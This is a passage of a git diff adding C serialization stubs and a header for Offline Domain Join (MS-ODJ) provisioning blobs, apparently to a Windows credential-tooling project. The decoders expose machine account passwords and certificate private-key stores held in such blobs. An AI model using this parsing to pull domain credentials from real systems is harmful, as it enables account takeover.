PODJ_PROVISION_DATA_Free(handle_t _MidlEsHandle, PODJ_PROVISION_DATA* _pType) +{ + NdrMesTypeFree2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + ODJ_PROVISION_DATA_Offset, _pType); +} + +size_t POP_PACKAGE_PART_AlignSize(handle_t _MidlEsHandle, POP_PACKAGE_PART* _pType) +{ + return NdrMesTypeAlignSize2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + OP_PACKAGE_PART_Offset, _pType); +} + +void POP_PACKAGE_PART_Encode(handle_t _MidlEsHandle, POP_PACKAGE_PART* _pType) +{ + NdrMesTypeEncode2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + OP_PACKAGE_PART_Offset, _pType); +} + +void POP_PACKAGE_PART_Decode(handle_t _MidlEsHandle, POP_PACKAGE_PART* _pType) +{ + NdrMesTypeDecode2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + OP_PACKAGE_PART_Offset, _pType); +} + +void POP_PACKAGE_PART_Free(handle_t _MidlEsHandle, POP_PACKAGE_PART* _pType) +{ + NdrMesTypeFree2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + OP_PACKAGE_PART_Offset, _pType); +} + +size_t POP_PACKAGE_PART_COLLECTION_AlignSize(handle_t _MidlEsHandle, POP_PACKAGE_PART_COLLECTION* _pType) +{ + return NdrMesTypeAlignSize2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + OP_PACKAGE_PART_COLLECTION_Offset, _pType); +} + +void POP_PACKAGE_PART_COLLECTION_Encode(handle_t _MidlEsHandle, POP_PACKAGE_PART_COLLECTION* _pType) +{ + NdrMesTypeEncode2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + OP_PACKAGE_PART_COLLECTION_Offset, _pType); +} + +void POP_PACKAGE_PART_COLLECTION_Decode(handle_t _MidlEsHandle, POP_PACKAGE_PART_COLLECTION* _pType) +{ + NdrMesTypeDecode2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + OP_PACKAGE_PART_COLLECTION_Offset, _pType); +} + +void POP_PACKAGE_PART_COLLECTION_Free(handle_t _MidlEsHandle, POP_PACKAGE_PART_COLLECTION* _pType) +{ + NdrMesTypeFree2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + OP_PACKAGE_PART_COLLECTION_Offset, _pType); +} + +size_t POP_PACKAGE_AlignSize(handle_t _MidlEsHandle, POP_PACKAGE* _pType) +{ + return NdrMesTypeAlignSize2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + OP_PACKAGE_Offset, _pType); +} + +void POP_PACKAGE_Encode(handle_t _MidlEsHandle, POP_PACKAGE* _pType) +{ + NdrMesTypeEncode2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + OP_PACKAGE_Offset, _pType); +} + +void POP_PACKAGE_Decode(handle_t _MidlEsHandle, POP_PACKAGE* _pType) +{ + NdrMesTypeDecode2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + OP_PACKAGE_Offset, _pType); +} + +void POP_PACKAGE_Free(handle_t _MidlEsHandle, POP_PACKAGE* _pType) +{ + NdrMesTypeFree2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + OP_PACKAGE_Offset, _pType); +} + +size_t PODJ_WIN7BLOB_AlignSize(handle_t _MidlEsHandle, PODJ_WIN7BLOB* _pType) +{ + return NdrMesTypeAlignSize2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + ODJ_WIN7BLOB_Offset, _pType); +} + +void PODJ_WIN7BLOB_Encode(handle_t _MidlEsHandle, PODJ_WIN7BLOB* _pType) +{ + NdrMesTypeEncode2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + ODJ_WIN7BLOB_Offset, _pType); +} + +void PODJ_WIN7BLOB_Decode(handle_t _MidlEsHandle, PODJ_WIN7BLOB* _pType) +{ + NdrMesTypeDecode2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + ODJ_WIN7BLOB_Offset, _pType); +} + +void PODJ_WIN7BLOB_Free(handle_t _MidlEsHandle, PODJ_WIN7BLOB* _pType) +{ + NdrMesTypeFree2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + ODJ_WIN7BLOB_Offset, _pType); +} + +size_t POP_JOINPROV2_PART_AlignSize(handle_t _MidlEsHandle, POP_JOINPROV2_PART* _pType) +{ + return NdrMesTypeAlignSize2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + OP_JOINPROV2_PART_Offset, _pType); +} + +void POP_JOINPROV2_PART_Encode(handle_t _MidlEsHandle, POP_JOINPROV2_PART* _pType) +{ + NdrMesTypeEncode2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + OP_JOINPROV2_PART_Offset, _pType); +} + +void POP_JOINPROV2_PART_Decode(handle_t _MidlEsHandle, POP_JOINPROV2_PART* _pType) +{ + NdrMesTypeDecode2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + OP_JOINPROV2_PART_Offset, _pType); +} + +void POP_JOINPROV2_PART_Free(handle_t _MidlEsHandle, POP_JOINPROV2_PART* _pType) +{ + NdrMesTypeFree2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + OP_JOINPROV2_PART_Offset, _pType); +} + +size_t POP_JOINPROV3_PART_AlignSize(handle_t _MidlEsHandle, POP_JOINPROV3_PART* _pType) +{ + return NdrMesTypeAlignSize2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + OP_JOINPROV3_PART_Offset, _pType); +} + +void POP_JOINPROV3_PART_Encode(handle_t _MidlEsHandle, POP_JOINPROV3_PART* _pType) +{ + NdrMesTypeEncode2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + OP_JOINPROV3_PART_Offset, _pType); +} + +void POP_JOINPROV3_PART_Decode(handle_t _MidlEsHandle, POP_JOINPROV3_PART* _pType) +{ + NdrMesTypeDecode2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + OP_JOINPROV3_PART_Offset, _pType); +} + +void POP_JOINPROV3_PART_Free(handle_t _MidlEsHandle, POP_JOINPROV3_PART* _pType) +{ + NdrMesTypeFree2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + OP_JOINPROV3_PART_Offset, _pType); +} + +size_t POP_POLICY_PART_AlignSize(handle_t _MidlEsHandle, POP_POLICY_PART* _pType) +{ + return NdrMesTypeAlignSize2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + OP_POLICY_PART_Offset, _pType); +} + +void POP_POLICY_PART_Encode(handle_t _MidlEsHandle, POP_POLICY_PART* _pType) +{ + NdrMesTypeEncode2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + OP_POLICY_PART_Offset, _pType); +} + +void POP_POLICY_PART_Decode(handle_t _MidlEsHandle, POP_POLICY_PART* _pType) +{ + NdrMesTypeDecode2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + OP_POLICY_PART_Offset, _pType); +} + +void POP_POLICY_PART_Free(handle_t _MidlEsHandle, POP_POLICY_PART* _pType) +{ + NdrMesTypeFree2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + OP_POLICY_PART_Offset, _pType); +} + +size_t POP_CERT_PART_AlignSize(handle_t _MidlEsHandle, POP_CERT_PART* _pType) +{ + return NdrMesTypeAlignSize2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + OP_CERT_PART_Offset, _pType); +} + +void POP_CERT_PART_Encode(handle_t _MidlEsHandle, POP_CERT_PART* _pType) +{ + NdrMesTypeEncode2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + OP_CERT_PART_Offset, _pType); +} + +void POP_CERT_PART_Decode(handle_t _MidlEsHandle, POP_CERT_PART* _pType) +{ + NdrMesTypeDecode2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + OP_CERT_PART_Offset, _pType); +} + +void POP_CERT_PART_Free(handle_t _MidlEsHandle, POP_CERT_PART* _pType) +{ + NdrMesTypeFree2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + OP_CERT_PART_Offset, _pType); +} \ No newline at end of file diff --git a/modules/rpc/kull_m_rpc_ms-odj.h b/modules/rpc/kull_m_rpc_ms-odj.h new file mode 100644 index 0000000..4448db6 --- /dev/null +++ b/modules/rpc/kull_m_rpc_ms-odj.h @@ -0,0 +1,211 @@ +#pragma once +#include "kull_m_rpc.h" +#include + +extern const GUID GUID_JOIN_PROVIDER, GUID_JOIN_PROVIDER2, GUID_JOIN_PROVIDER3, GUID_CERT_PROVIDER, GUID_POLICY_PROVIDER; + +#define ODJ_WIN7_FORMAT 0x00000001 // The bytes contained in pBlob must contain a serialized ODJ_WIN7_BLOB structure +#define ODJ_WIN8_FORMAT 0x00000002 // The bytes contained in pBlob must contain a serialized OP_PACKAGE structure + +typedef struct _ODJ_BLOB { + ULONG ulODJFormat; + ULONG cbBlob; + PBYTE pBlob; +} ODJ_BLOB, * PODJ_BLOB; + +typedef struct _ODJ_PROVISION_DATA { + ULONG ulVersion; // 1 + ULONG ulcBlobs; + PODJ_BLOB pBlobs; +} ODJ_PROVISION_DATA, * PODJ_PROVISION_DATA; + +typedef struct _OP_BLOB { + ULONG cbBlob; + PBYTE pBlob; +} OP_BLOB, * POP_BLOB; + +/* PartType +GUID_JOIN_PROVIDER {631c7621-5289-4321-bc9e-80f843f868c3} Contains a serialized ODJ_WIN7_BLOB structure. +GUID_JOIN_PROVIDER2 {57bfc56b-52f9-480c-adcb-91b3f8a82317} Contains a serialized OP_JOIN_PROV2_PART structure. +GUID_JOIN_PROVIDER3 {fc0ccf25-7ffa-474a-8611-69ffe269645f} Contains a serialized OP_JOIN_PROV3_PART structure. +GUID_CERT_PROVIDER {9c0971e9-832f-4873-8e87-ef1419d4781e} Contains a serialized OP_CERT_PART structure. +GUID_POLICY_PROVIDER {68fb602a-0c09-48ce-b75f-07b7bd58f7ec} Contains a serialized OP_POLICY_PART structure. +*/ + +#define OPSPI_PACKAGE_PART_ESSENTIAL 0x00000001 // This package part is considered essential. If the consumer does not recognize this package part or fails to successfully process it, the overall operation must fail. + +typedef struct _OP_PACKAGE_PART { + GUID PartType; + ULONG ulFlags; + OP_BLOB Part; + OP_BLOB Extension; // Reserved for future use and MUST be set to all zeros. +} OP_PACKAGE_PART, * POP_PACKAGE_PART; + +typedef struct _OP_PACKAGE_PART_COLLECTION { + ULONG cParts; + POP_PACKAGE_PART pParts; + OP_BLOB Extension; +} OP_PACKAGE_PART_COLLECTION, * POP_PACKAGE_PART_COLLECTION; + +typedef struct _OP_PACKAGE { + GUID EncryptionType; // Reserved for future use and MUST be set to GUID_NULL. + OP_BLOB EncryptionContext; // Reserved for future use and MUST be set to all zeros. + OP_BLOB WrappedPartCollection; // An OP_BLOB structure that contains a serialized OP_PACKAGE_COLLECTION structure. + ULONG cbDecryptedPartCollection; // Reserved for future use and MUST be set to zero. + OP_BLOB Extension; // Reserved for future use and MUST be set to all zeros. +} OP_PACKAGE, * POP_PACKAGE; + +typedef struct _ODJ_SID { + UCHAR Revision; + UCHAR SubAuthorityCount; + SID_IDENTIFIER_AUTHORITY IdentifierAuthority; + ULONG SubAuthority[ANYSIZE_ARRAY]; +} ODJ_SID, * PODJ_SID; + +typedef struct _ODJ_UNICODE_STRING { + USHORT Length; + USHORT MaximumLength; + PWSTR Buffer; +} ODJ_UNICODE_STRING, * PODJ_UNICODE_STRING; + +typedef struct _ODJ_POLICY_DNS_DOMAIN_INFO { + ODJ_UNICODE_STRING Name; + ODJ_UNICODE_STRING DnsDomainName; + ODJ_UNICODE_STRING DnsForestName; + GUID DomainGuid; + PODJ_SID Sid; +} ODJ_POLICY_DNS_DOMAIN_INFO; + +typedef struct _ODJ_WIN7BLOB { + wchar_t* lpDomain; + wchar_t* lpMachineName; + wchar_t* lpMachinePassword; + ODJ_POLICY_DNS_DOMAIN_INFO DnsDomainInfo; + DOMAIN_CONTROLLER_INFOW DcInfo; + DWORD Options; +} ODJ_WIN7BLOB, * PODJ_WIN7BLOB; + +#define OP_JP2_FLAG_PERSISTENTSITE 0x00000001 // The site specified in lpSiteName MUST be considered the permanent site for the client. +typedef struct _OP_JOINPROV2_PART { + DWORD dwFlags; + wchar_t* lpNetbiosName; + wchar_t* lpSiteName; + wchar_t* lpPrimaryDNSDomain; + DWORD dwReserved; + wchar_t* lpReserved; +} OP_JOINPROV2_PART, * POP_JOINPROV2_PART; + +typedef struct _OP_JOINPROV3_PART { + DWORD Rid; + wchar_t* lpSid; +} OP_JOINPROV3_PART, * POP_JOINPROV3_PART; + +typedef struct _OP_POLICY_ELEMENT { + wchar_t* pKeyPath; + wchar_t* pValueName; + ULONG ulValueType; + ULONG cbValueData; + PBYTE pValueData; +} OP_POLICY_ELEMENT, * POP_POLICY_ELEMENT; + +typedef struct _OP_POLICY_ELEMENT_LIST { + wchar_t* pSource; + ULONG ulRootKeyId; // Contains the identifier of the root registry key; currently must be set to HKEY_LOCAL_MACHINE. + ULONG cElements; + POP_POLICY_ELEMENT pElements; +} OP_POLICY_ELEMENT_LIST, * POP_POLICY_ELEMENT_LIST; + +typedef struct _OP_POLICY_PART { + ULONG cElementLists; + POP_POLICY_ELEMENT_LIST pElementLists; + OP_BLOB Extension; // Reserved for future use and must contain all zeros +} OP_POLICY_PART, * POP_POLICY_PART; + +typedef struct _OP_CERT_PFX_STORE { + wchar_t* pTemplateName; + ULONG ulPrivateKeyExportPolicy; + wchar_t* pPolicyServerUrl; + ULONG ulPolicyServerUrlFlags; + wchar_t* pPolicyServerId; + ULONG cbPfx; + PBYTE pPfx; +} OP_CERT_PFX_STORE, * POP_CERT_PFX_STORE; + +typedef struct _OP_CERT_SST_STORE { + ULONG StoreLocation; + wchar_t* pStoreName; + ULONG cbSst; + PBYTE pSst; +} OP_CERT_SST_STORE, * POP_CERT_SST_STORE; + +typedef struct _OP_CERT_PART { + ULONG cPfxStores; + POP_CERT_PFX_STORE pPfxStores; + ULONG cSstStores; + POP_CERT_SST_STORE pSstStores; + OP_BLOB Extension; +} OP_CERT_PART, * POP_CERT_PART; + +size_t POP_PACKAGE_AlignSize(handle_t _MidlEsHandle, POP_PACKAGE * _pType); +size_t PODJ_WIN7BLOB_AlignSize(handle_t _MidlEsHandle, PODJ_WIN7BLOB * _pType); +size_t POP_JOINPROV2_PART_AlignSize(handle_t _MidlEsHandle, POP_JOINPROV2_PART * _pType); +size_t POP_JOINPROV3_PART_AlignSize(handle_t _MidlEsHandle, POP_JOINPROV3_PART * _pType); +size_t PODJ_PROVISION_DATA_AlignSize(handle_t _MidlEsHandle, PODJ_PROVISION_DATA * _pType); +size_t POP_PACKAGE_PART_COLLECTION_AlignSize(handle_t _MidlEsHandle, POP_PACKAGE_PART_COLLECTION * _pType); +size_t POP_PACKAGE_PART_AlignSize(handle_t _MidlEsHandle, POP_PACKAGE_PART * _pType); +size_t POP_CERT_PART_AlignSize(handle_t _MidlEsHandle, POP_CERT_PART * _pType); +size_t POP_POLICY_PART_AlignSize(handle_t _MidlEsHandle, POP_POLICY_PART * _pType); + +void POP_PACKAGE_Encode(handle_t _MidlEsHandle, POP_PACKAGE * _pType); +void POP_JOINPROV3_PART_Encode(handle_t _MidlEsHandle, POP_JOINPROV3_PART * _pType); +void POP_JOINPROV2_PART_Encode(handle_t _MidlEsHandle, POP_JOINPROV2_PART * _pType); +void PODJ_WIN7BLOB_Encode(handle_t _MidlEsHandle, PODJ_WIN7BLOB * _pType); +void PODJ_PROVISION_DATA_Encode(handle_t _MidlEsHandle, PODJ_PROVISION_DATA * _pType); +void POP_PACKAGE_PART_COLLECTION_Encode(handle_t _MidlEsHandle, POP_PACKAGE_PART_COLLECTION * _pType); +void POP_PACKAGE_PART_Encode(handle_t _MidlEsHandle, POP_PACKAGE_PART * _pType); +void POP_CERT_PART_Encode(handle_t _MidlEsHandle, POP_CERT_PART * _pType); +void POP_POLICY_PART_Encode(handle_t _MidlEsHandle, POP_POLICY_PART * _pType); + +void POP_PACKAGE_Decode(handle_t _MidlEsHandle, POP_PACKAGE * _pType); +void POP_JOINPROV3_PART_Decode(handle_t _MidlEsHandle, POP_JOINPROV3_PART * _pType); +void PODJ_WIN7BLOB_Decode(handle_t _MidlEsHandle, PODJ_WIN7BLOB * _pType); +void POP_JOINPROV2_PART_Decode(handle_t _MidlEsHandle, POP_JOINPROV2_PART * _pType); +void PODJ_PROVISION_DATA_Decode(handle_t _MidlEsHandle, PODJ_PROVISION_DATA * _pType); +void POP_PACKAGE_PART_Decode(handle_t _MidlEsHandle, POP_PACKAGE_PART * _pType); +void POP_PACKAGE_PART_COLLECTION_Decode(handle_t _MidlEsHandle, POP_PACKAGE_PART_COLLECTION * _pType); +void POP_CERT_PART_Decode(handle_t _MidlEsHandle, POP_CERT_PART * _pType); +void POP_POLICY_PART_Decode(handle_t _MidlEsHandle, POP_POLICY_PART * _pType); + +void POP_PACKAGE_Free(handle_t _MidlEsHandle, POP_PACKAGE * _pType); +void POP_JOINPROV2_PART_Free(handle_t _MidlEsHandle, POP_JOINPROV2_PART * _pType); +void PODJ_WIN7BLOB_Free(handle_t _MidlEsHandle, PODJ_WIN7BLOB * _pType); +void POP_JOINPROV3_PART_Free(handle_t _MidlEsHandle, POP_JOINPROV3_PART * _pType); +void PODJ_PROVISION_DATA_Free(handle_t _MidlEsHandle, PODJ_PROVISION_DATA * _pType); +void POP_PACKAGE_PART_Free(handle_t _MidlEsHandle, POP_PACKAGE_PART * _pType); +void POP_PACKAGE_PART_COLLECTION_Free(handle_t _MidlEsHandle, POP_PACKAGE_PART_COLLECTION * _pType); +void POP_CERT_PART_Free(handle_t _MidlEsHandle, POP_CERT_PART * _pType); +void POP_POLICY_PART_Free(handle_t _MidlEsHandle, POP_POLICY_PART * _pType); + +#define kull_m_rpc_DecodeODJ_PROVISION_DATA(/*PVOID */data, /*DWORD */size, /*PODJ_PROVISION_DATA **/pObject) kull_m_rpc_Generic_Decode(data, size, pObject, (PGENERIC_RPC_DECODE) PODJ_PROVISION_DATA_Decode) +#define kull_m_rpc_FreeODJ_PROVISION_DATA(/*PODJ_PROVISION_DATA **/pObject) kull_m_rpc_Generic_Free(pObject, (PGENERIC_RPC_FREE) PODJ_PROVISION_DATA_Free) + +#define kull_m_rpc_DecodeODJ_WIN7BLOB(/*PVOID */data, /*DWORD */size, /*PODJ_WIN7BLOB **/pObject) kull_m_rpc_Generic_Decode(data, size, pObject, (PGENERIC_RPC_DECODE) PODJ_WIN7BLOB_Decode) +#define kull_m_rpc_FreeODJ_WIN7BLOB(/*PODJ_WIN7BLOB **/pObject) kull_m_rpc_Generic_Free(pObject, (PGENERIC_RPC_FREE) PODJ_WIN7BLOB_Free) + +#define kull_m_rpc_DecodeOP_PACKAGE(/*PVOID */data, /*DWORD */size, /*POP_PACKAGE **/pObject) kull_m_rpc_Generic_Decode(data, size, pObject, (PGENERIC_RPC_DECODE) POP_PACKAGE_Decode) +#define kull_m_rpc_FreeOP_PACKAGE(/*POP_PACKAGE **/pObject) kull_m_rpc_Generic_Free(pObject, (PGENERIC_RPC_FREE) POP_PACKAGE_Free) + +#define kull_m_rpc_DecodeOP_PACKAGE_PART_COLLECTION(/*PVOID */data, /*DWORD */size, /*POP_PACKAGE_PART_COLLECTION **/pObject) kull_m_rpc_Generic_Decode(data, size, pObject, (PGENERIC_RPC_DECODE) POP_PACKAGE_PART_COLLECTION_Decode) +#define kull_m_rpc_FreeOP_PACKAGE_PART_COLLECTION(/*POP_PACKAGE_PART_COLLECTION **/pObject) kull_m_rpc_Generic_Free(pObject, (PGENERIC_RPC_FREE) POP_PACKAGE_PART_COLLECTION_Free) + +#define kull_m_rpc_DecodeOP_JOINPROV2_PART(/*PVOID */data, /*DWORD */size, /*POP_JOINPROV2_PART **/pObject) kull_m_rpc_Generic_Decode(data, size, pObject, (PGENERIC_RPC_DECODE) POP_JOINPROV2_PART_Decode) +#define kull_m_rpc_FreeOP_JOINPROV2_PART(/*POP_JOINPROV2_PART **/pObject) kull_m_rpc_Generic_Free(pObject, (PGENERIC_RPC_FREE) POP_JOINPROV2_PART_Free) + +#define kull_m_rpc_DecodeOP_JOINPROV3_PART(/*PVOID */data, /*DWORD */size, /*POP_JOINPROV3_PART **/pObject) kull_m_rpc_Generic_Decode(data, size, pObject, (PGENERIC_RPC_DECODE) POP_JOINPROV3_PART_Decode) +#define kull_m_rpc_FreeOP_JOINPROV3_PART(/*POP_JOINPROV3_PART **/pObject) kull_m_rpc_Generic_Free(pObject, (PGENERIC_RPC_FREE) POP_JOINPROV3_PART_Free) + +#define kull_m_rpc_DecodeOP_CERT_PART(/*PVOID */data, /*DWORD */size, /*POP_CERT_PART **/pObject) kull_m_rpc_Generic_Decode(data, size, pObject, (PGENERIC_RPC_DECODE) POP_CERT_PART_Decode) +#define kull_m_rpc_FreeOP_CERT_PART(/*POP_CERT_PART **/pObject) kull_m_rpc_Generic_Free(pObject, (PGENERIC_RPC_FREE) POP_CERT_PART_Free) + +#define kull_m_rpc_DecodeOP_POLICY_PART(/*PVOID */data, /*DWORD */size, /*POP_POLICY_PART **/pObject) kull_m_rpc_Generic_Decode(data, size, pObject, (PGENERIC_RPC_DECODE) POP_POLICY_PART_Decode) +#define kull_m_rpc_FreeOP_POLICY_PART(/*POP_POLICY_PART **/pObject) kull_m_rpc_Generic_Free(pObject, (PGENERIC_RPC_FREE) POP_POLICY_PART_Free) \ No newline at end of file